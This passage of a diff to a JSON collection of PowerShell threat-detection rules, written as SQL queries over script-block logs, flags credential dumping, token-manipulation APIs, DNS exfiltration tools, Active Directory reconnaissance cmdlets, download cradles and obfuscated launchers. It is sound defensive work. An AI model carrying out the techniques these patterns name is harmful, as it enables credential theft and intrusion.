\"TroubleshootingPack\" cmdlet for troubleshooting purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%AddSecurityPackage%' ESCAPE '\\' OR ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%Advapi32%' ESCAPE '\\' OR ScriptBlockText LIKE '%CloseHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateProcessWithToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateRemoteThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%CreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%DangerousGetHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%DuplicateTokenEx%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnumerateSecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%FreeLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetDelegateForFunctionPointer%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetLogonSessionData%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetModuleHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetProcessHandle%' ESCAPE '\\' OR ScriptBlockText LIKE '%GetTokenInformation%' ESCAPE '\\' OR ScriptBlockText LIKE '%ImpersonateLoggedOnUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%kernel32%' ESCAPE '\\' OR ScriptBlockText LIKE '%LoadLibrary%' ESCAPE '\\' OR ScriptBlockText LIKE '%memcpy%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%msvcrt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ntdll%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenDesktop%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenProcessToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%OpenWindowStation%' ESCAPE '\\' OR ScriptBlockText LIKE '%QueueUserApc%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%RtlCreateUserThread%' ESCAPE '\\' OR ScriptBlockText LIKE '%secur32%' ESCAPE '\\' OR ScriptBlockText LIKE '%SetThreadToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualAlloc%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualFree%' ESCAPE '\\' OR ScriptBlockText LIKE '%VirtualProtect%' ESCAPE '\\' OR ScriptBlockText LIKE '%WaitForSingleObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteInt32%' ESCAPE '\\' OR ScriptBlockText LIKE '%WriteProcessMemory%' ESCAPE '\\' OR ScriptBlockText LIKE '%ZeroFreeGlobalAllocUnicode%' ESCAPE '\\') AND NOT ((ScriptBlockText LIKE '# Copyright 2016 Amazon.com, Inc. or its affiliates.%' ESCAPE '\\' AND ScriptBlockText LIKE '%function Import-SerialPortUtil %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-TroubleshootingPack%' ESCAPE '\\' AND ScriptBlockText LIKE '%C:\\\\Windows\\\\Diagnostics\\\\System\\\\PCW%' ESCAPE '\\' AND ScriptBlockText LIKE '%-AnswerFile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Unattended%' ESCAPE '\\')" ], - "filename": "posh_ps_accessing_win_api.yml" + "filename": "posh_ps_susp_follina_execution.yml" }, { - "title": "Powershell DNSExfiltration", - "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "title": "Powershell Store File In Alternate Data Stream", + "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", "status": "test", - "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_dnsexfiltration.yml" + "filename": "posh_ps_store_file_in_alternate_data_stream.yml" }, { - "title": "Malicious PowerView PowerShell Commandlets", - "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", - "status": "test", - "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", - "author": "Bhabesh Raj", + "title": "Suspicious New-PSDrive to Admin Share", + "id": "1c563233-030e-4a07-af8c-ee0490a66d3a", + "status": "experimental", + "description": "Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Should not be any as administrators do not use this tool" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-UserImpersonation%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Request-SPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resolve-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-ADObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DomainUserPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Test-AdminAccess%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" ], - "filename": "posh_ps_powerview_malicious_commandlets.yml" + "filename": "posh_ps_susp_new_psdrive.yml" }, { - "title": "Dnscat Execution", - "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", - "status": "test", - "description": "Dnscat exfiltration tool execution", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", + "status": "experimental", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ - "attack.exfiltration", - "attack.t1048", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + "Legitimate script that disables the command history" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "posh_ps_dnscat_execution.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "PowerShell Credential Prompt", - "id": "ca8b77a9-d499-4095-b793-5d5f330d450e", - "status": "test", - "description": "Detects PowerShell calling a credential prompt", - "author": "John Lambert (idea), Florian Roth (Nextron Systems)", + "title": "Modify Group Policy Settings - ScriptBlockLogging", + "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", + "status": "experimental", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1484.001" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PromptForCredential%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "posh_ps_prompt_credentials.yml" + "filename": "posh_ps_modify_group_policy_settings.yml" }, { - "title": "Troubleshooting Pack Cmdlet Execution", - "id": "03409c93-a7c7-49ba-9a4c-a00badf2a153", + "title": "WMIC Unquoted Services Path Lookup - PowerShell", + "id": "09658312-bc27-4a3b-91c5-e49ab9046d1b", "status": "experimental", - "description": "Detects execution of \"TroubleshootingPack\" cmdlets to leverage CVE-2022-30190 or action similar to \"msdt\" lolbin (as described in LOLBAS)", + "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1047" ], "falsepositives": [ - "Legitimate usage of \"TroubleshootingPack\" cmdlet for troubleshooting purposes" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Invoke-TroubleshootingPack%' ESCAPE '\\' AND ScriptBlockText LIKE '%C:\\\\Windows\\\\Diagnostics\\\\System\\\\PCW%' ESCAPE '\\' AND ScriptBlockText LIKE '%-AnswerFile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Unattended%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject %' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi %' ESCAPE '\\') AND ScriptBlockText LIKE '% Win32\\_Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%Name%' ESCAPE '\\' AND ScriptBlockText LIKE '%DisplayName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PathName%' ESCAPE '\\' AND ScriptBlockText LIKE '%StartMode%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_follina_execution.yml" + "filename": "posh_ps_wmi_unquoted_service_search.yml" }, { - "title": "Suspicious GetTypeFromCLSID ShellExecute", - "id": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", - "status": "experimental", - "description": "Detects suspicious Powershell code that execute COM Objects", + "title": "Get-ADUser Enumeration Using UserAccountControl Flags", + "id": "96c982fe-3d08-4df4-bed2-eb14e02f21c8", + "status": "test", + "description": "Detects AS-REP roasting is an attack that is often-overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.", "author": "frack113", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.015" + "attack.discovery", + "attack.t1033" ], "falsepositives": [ "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%::GetTypeFromCLSID(%' ESCAPE '\\' AND ScriptBlockText LIKE '%.ShellExecute(%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ADUser%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Filter%' ESCAPE '\\' AND ScriptBlockText LIKE '%useraccountcontrol%' ESCAPE '\\' AND ScriptBlockText LIKE '%-band%' ESCAPE '\\' AND ScriptBlockText LIKE '%4194304%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_gettypefromclsid.yml" + "filename": "posh_ps_as_rep_roasting.yml" }, { - "title": "Potential COM Objects Download Cradles Usage - PS Script", - "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", "status": "experimental", - "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", - "author": "frack113", - "falsepositives": [ - "Legitimate use of the library" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" - ], - "filename": "posh_ps_download_com_cradles.yml" - }, - { - "title": "Malicious PowerShell Keywords", - "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", - "status": "test", - "description": "Detects keywords from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ + "attack.defense_evasion", + "attack.t1027", "attack.execution", "attack.t1059.001" ], @@ -5917,427 +5775,462 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "posh_ps_malicious_keywords.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Manipulation of User Computer or Group Security Principals Across AD", - "id": "b29a93fb-087c-4b5b-a84d-ee3309e69d08", + "title": "Suspicious IO.FileStream", + "id": "70ad982f-67c8-40e0-a955-b920c2fa05cb", "status": "test", - "description": "Adversaries may create a domain account to maintain access to victim systems.\nDomain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain..\n", + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1136.002" + "attack.defense_evasion", + "attack.t1070.003" ], "falsepositives": [ - "Legitimate administrative script" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.DirectoryServices.AccountManagement%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%IO.FileStream%' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\.\\\\\\*' ESCAPE '\\')" ], - "filename": "posh_ps_directoryservices_accountmanagement.yml" + "filename": "posh_ps_susp_iofilestream.yml" }, { - "title": "WMIC Unquoted Services Path Lookup - PowerShell", - "id": "09658312-bc27-4a3b-91c5-e49ab9046d1b", + "title": "PowerShell Write-EventLog Usage", + "id": "35f41cd7-c98e-469f-8a02-ec4ba0cc7a7e", "status": "experimental", - "description": "Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts", + "description": "Detects usage of the \"Write-EventLog\" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate applications writing events via this cmdlet. Investigate alerts to determine if the action is benign" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject %' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi %' ESCAPE '\\') AND ScriptBlockText LIKE '% Win32\\_Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%Name%' ESCAPE '\\' AND ScriptBlockText LIKE '%DisplayName%' ESCAPE '\\' AND ScriptBlockText LIKE '%PathName%' ESCAPE '\\' AND ScriptBlockText LIKE '%StartMode%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Write-EventLog%' ESCAPE '\\' AND ScriptBlockText LIKE '%-RawData %' ESCAPE '\\')" ], - "filename": "posh_ps_wmi_unquoted_service_search.yml" + "filename": "posh_ps_susp_write_eventlog.yml" }, { - "title": "Suspicious Service DACL Modification Via Set-Service Cmdlet - PS", - "id": "22d80745-6f2c-46da-826b-77adaededd74", + "title": "Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell", + "id": "e6cb92b4-b470-4eb8-8a9d-d63e8583aae0", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare intended use of hidden services", - "Rare FP could occur due to the non linearity of the ScriptBlockText log" + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%rundll32.exe%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND ScriptBlockText LIKE '%powershell%' ESCAPE '\\')" + ], + "filename": "posh_ps_invoke_obfuscation_via_rundll.yml" + }, + { + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "author": "frack113", + "tags": [ + "attack.credential_access", + "attack.t1003.003" + ], + "falsepositives": [ + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR ScriptBlockText LIKE '%-sd %' ESCAPE '\\') AND ScriptBlockText LIKE '%Set-Service %' ESCAPE '\\' AND ScriptBlockText LIKE '%D;;%' ESCAPE '\\' AND (ScriptBlockText LIKE '%;;;IU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;SU%' ESCAPE '\\' OR ScriptBlockText LIKE '%;;;BA%' ESCAPE '\\' OR ScriptBlockText LIKE 